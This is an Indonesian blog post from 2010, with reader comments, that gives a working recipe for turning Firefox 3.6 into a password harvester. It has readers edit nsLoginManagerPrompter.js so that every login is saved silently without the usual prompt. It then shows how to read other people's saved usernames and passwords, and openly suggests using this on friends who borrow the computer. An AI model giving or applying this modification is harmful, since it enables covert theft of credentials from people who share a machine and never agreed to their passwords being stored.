Sunday, August 15, 2010

Merubah Javascript Firefox Untuk Keylogging

Dengan javascript ini browser kita akan otomatis nge-save semua username & password tanpa ada konfirmasi "Save Password"
Intinya adalah menghilangkan notifikasi pop-up simpan pesan pada firefox / flock

Langsung ke TKP
1. Lihat Versi Firefox , bisa berjalan di versi 3.6

2. Pastikan komputer kita gak ada deepfreeze

3. Msuk k Local disk C: , plih Program Files => Mozilla Firefox => Components..
Cari file yang bernama
"Ns Login Manager Prompter.js"
Buka Dengan notepad kemudian tambahkan kode berikut :

_showSaveLoginNotification :
function (aNotifyBox, aLogin) {
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
},


Ingat kode tersebut ditambahkan diantara script dibawah ini
gunakan fitur find pada notepad untuk mempercepat pencarian.

Hasilnya seperti ini :


/*
* _showSaveLoginNotification
*
* Displays a notification bar
(rather than a popup), to allow
the user to
* save the specified login. This
allows the user to see the
results of
* their login, and only save a
login which they know worked.
*
*/


_showSaveLoginNotification :
function (aNotifyBox, aLogin) {
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
},



/*
* _removeLoginNotifications
*
*/


4. Kemudian Save,
5. Jalankan firefox dan coba masuk ke situs yang ada form login , masukkan username & password .
Setelah anda klik login / sig in tidak akan muncul popup Remember Password.
Kemudian klik toolbar View => options => Security => Saved Password
pasti ada keterangan situs dan usernamenya , untuk memunculkan  klik "Show Password"
(ada notify box, klik Yes )

Alhasil nama situs beserta username dan password akan terlihat ,
Nah , bayangkan seandainya banyak orang yang gunain komputer / laptop anda , anda akan banyak menemukan username & password dari teman-teman anda.
hehehe
sekian, mohon jangan disalahgunakan ...

Peace

6 comments

udah q coba g bisa gan..
ato mngkn q yg g bisa..
maklum newbie.
salam kenal,iwant.

tampilan di file mozilla nya bnyak bgt. gk kyak cntoh d atas,,, pusing pala nae,,,

bisa kok , mungkin kurang teliti aja :)

kok d mozzila 4 ga ada gan....? Ns Login Manager Prompter.js nya....?

http://arsa45.blogspot.com/

skrip js nya udah di ganti kaya gtu...
masuk fb tanpa klik remember password, tp gw cek ke saved password...
masih gak da tuh... -_-

Jika tidak jelas silakan komentar ya

Terima kasih atas kunjungan Anda.
Emoticon Emoticon